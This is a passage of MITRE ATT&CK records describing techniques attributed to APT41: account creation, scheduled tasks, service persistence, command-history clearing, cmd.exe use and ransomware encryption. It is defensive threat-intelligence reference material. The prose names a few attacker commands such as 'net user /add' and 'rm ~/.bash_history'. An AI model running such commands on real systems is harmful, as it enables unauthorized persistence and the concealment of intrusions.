created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--635cbe30-392d-4e27-978e-66774357c762
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has created user accounts.(Citation: FireEye APT41 Aug 2019) 
relationship_id : relationship--410d7922-e288-49ea-9607-27942505a416
revoked : False
technique : Local Account
technique_description : Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. 

For example, with a sufficient level of access, the Windows <code>net user /add</code> command can be used to create a local account. On macOS systems the <code>dscl -create</code> command can be used to create a local account. Local accounts may also be added to network devices, often via common [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as <code>username</code>, or to Kubernetes clusters using the `kubectl` utility.(Citation: cisco_username_cmd)(Citation: Kubernetes Service Accounts Security)

Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence')]
technique_id : T1136.001
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Network', 'Containers']
data_sources : ['User Account: User Account Creation', 'Process: Process Creation', 'Command: Command Execution']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used a compromised account to create a scheduled task on a system.(Citation: FireEye APT41 Aug 2019)(Citation: Crowdstrike GTR2020 Mar 2020)
relationship_id : relationship--6a653820-adc1-4068-ab78-9165f2a2c5c1
revoked : False
technique : Scheduled Task
technique_description : Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111) utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.

The deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)), though <code>at.exe</code> can not access tasks created with <code>schtasks</code> or the Control Panel.

An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a process under the context of a specified account (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused the Windows Task Scheduler to potentially mask one-time execution under signed/trusted system processes.(Citation: ProofPoint Serpent)

Adversaries may also create "hidden" scheduled tasks (i.e. [Hide Artifacts](https://attack.mitre.org/techniques/T1564)) that may not be visible to defender tools and manual queries used to enumerate tasks. Specifically, an adversary may hide a task from `schtasks /query` and the Task Scheduler by deleting the associated Security Descriptor (SD) registry value (where deletion of this value must be completed using SYSTEM permissions).(Citation: SigmaHQ)(Citation: Tarrask scheduled task) Adversaries may also employ alternate methods to hide tasks, such as altering the metadata (e.g., `Index` value) within associated registry keys.(Citation: Defending Against Scheduled Task Attacks in Windows Environments) 
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation')]
technique_id : T1053.005
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Windows Registry: Windows Registry Key Creation', 'File: File Modification', 'File: File Creation', 'Process: Process Creation', 'Command: Command Execution', 'Network Traffic: Network Traffic Flow', 'Scheduled Job: Scheduled Job Creation']
permissions_required : ['Administrator']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) modified legitimate Windows services to install malware backdoors.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021) [APT41](https://attack.mitre.org/groups/G0096) created the StorSyncSvc service to provide persistence for Cobalt Strike.(Citation: FireEye APT41 March 2020)
relationship_id : relationship--29cd1209-5e90-448f-83d3-42c3ecdd1f70
revoked : False
technique : Windows Service
technique_description : Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.

Adversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API. 

Adversaries may also use services to install and execute malicious drivers. For example, after dropping a driver file (ex: `.sys`) to disk, the payload can be loaded and registered via [Native API](https://attack.mitre.org/techniques/T1106) functions such as `CreateServiceW()` (or manually via functions such as `ZwLoadDriver()` and `ZwSetValueKey()`), by creating the required service Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)), or by using command-line utilities such as `PnPUtil.exe`.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Unit42 AcidBox June 2020) Adversaries may leverage these drivers as [Rootkit](https://attack.mitre.org/techniques/T1014)s to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as "Bring Your Own Vulnerable Driver" (BYOVD)) as part of [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020)

Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). To make detection analysis more challenging, malicious services may also incorporate [Masquerade Task or Service](https://attack.mitre.org/techniques/T1036/004) (ex: using a service and/or payload name related to a legitimate OS or benign software component).
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation')]
technique_id : T1543.003
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Windows Registry: Windows Registry Key Modification', 'Process: Process Creation', 'Network Traffic: Network Traffic Flow', 'Service: Service Creation', 'Command: Command Execution', 'File: File Metadata', 'Windows Registry: Windows Registry Key Creation', 'Driver: Driver Load', 'Service: Service Modification', 'Process: OS API Execution']
effective_permissions : ['Administrator', 'SYSTEM']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--3aef9463-9a7a-43ba-8957-a867e07c1e6a
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) attempted to remove evidence of some of its activity by deleting Bash histories.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--f8838a1f-3a62-40cc-98dd-55943091fcef
revoked : False
technique : Clear Command History
technique_description : In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.

On Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable <code>HISTFILE</code>. When a user logs off a system, this information is flushed to a file in the user's home directory called <code>~/.bash_history</code>. The benefit of this is that it allows users to go back to commands they've used before in different sessions.

Adversaries may delete their commands from these logs by manually clearing the history (<code>history -c</code>) or deleting the bash history file <code>rm ~/.bash_history</code>.  

Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to clear command history data (<code>clear logging</code> and/or <code>clear history</code>).(Citation: US-CERT-TA18-106A)

On Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the <code>PSReadLine</code> module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.

The <code>PSReadLine</code> command history tracks the commands used in all PowerShell sessions and writes them to a file (<code>$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt</code> by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)

Adversaries may run the PowerShell command <code>Clear-History</code> to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the <code>ConsoleHost_history.txt</code> file. Adversaries may also delete the <code>ConsoleHost_history.txt</code> file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1070.003
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Network']
data_sources : ['File: File Deletion', 'File: File Modification', 'Command: Command Execution', 'User Account: User Account Authentication']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used <code>cmd.exe /c</code> to execute commands on remote machines.(Citation: FireEye APT41 Aug 2019)
[APT41](https://attack.mitre.org/groups/G0096) used a batch file to install persistence for the [Cobalt Strike](https://attack.mitre.org/software/S0154) BEACON loader.(Citation: FireEye APT41 March 2020)
relationship_id : relationship--81a15403-9bb3-408a-8da6-97c64209c829
revoked : False
technique : Windows Command Shell
technique_description : Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)

Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.

Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execute various commands and payloads. Common uses include [cmd](https://attack.mitre.org/software/S0106) to execute a single command, or abusing [cmd](https://attack.mitre.org/software/S0106) interactively with input and output forwarded over a command and control channel.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')]
technique_id : T1059.003
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Command: Command Execution', 'Process: Process Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--b80d107d-fa0d-4b60-9684-b0433e8bdba0
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used a ransomware called Encryptor RaaS to encrypt files on the targeted systems and provide a ransom note to the user.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--acfaf7ec-7b92-40ec-a844-17089791a663
revoked : False
technique : Data Encrypted for Impact
technique_description : Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018)

In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted (and often renamed and/or tagged with specific file markers). Adversaries may need to first employ other behaviors, such as [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529), in order to unlock and/or gain access to manipulate these files.(Citation: CarbonBlack Conti July 2020) In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017) 

To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017) Encryption malware may also leverage [Internal Defacement](https://attack.mitre.org/techniques/T1491/001), such as changing victim wallpapers, or otherwise intimidate victims by sending ransom notes or other messages to connected printers (known as "print bombing").(Citation: NHS Digital Egregor Nov 2020)

In cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='impact')]
technique_id : T1486
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'IaaS']
data_sources : ['File: File Modification', 'Cloud Storage: Cloud Storage Modification', 'Network Share: Network Share Access', 'File: File Creation', 'Command: Command Execution', 'Process: Process Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
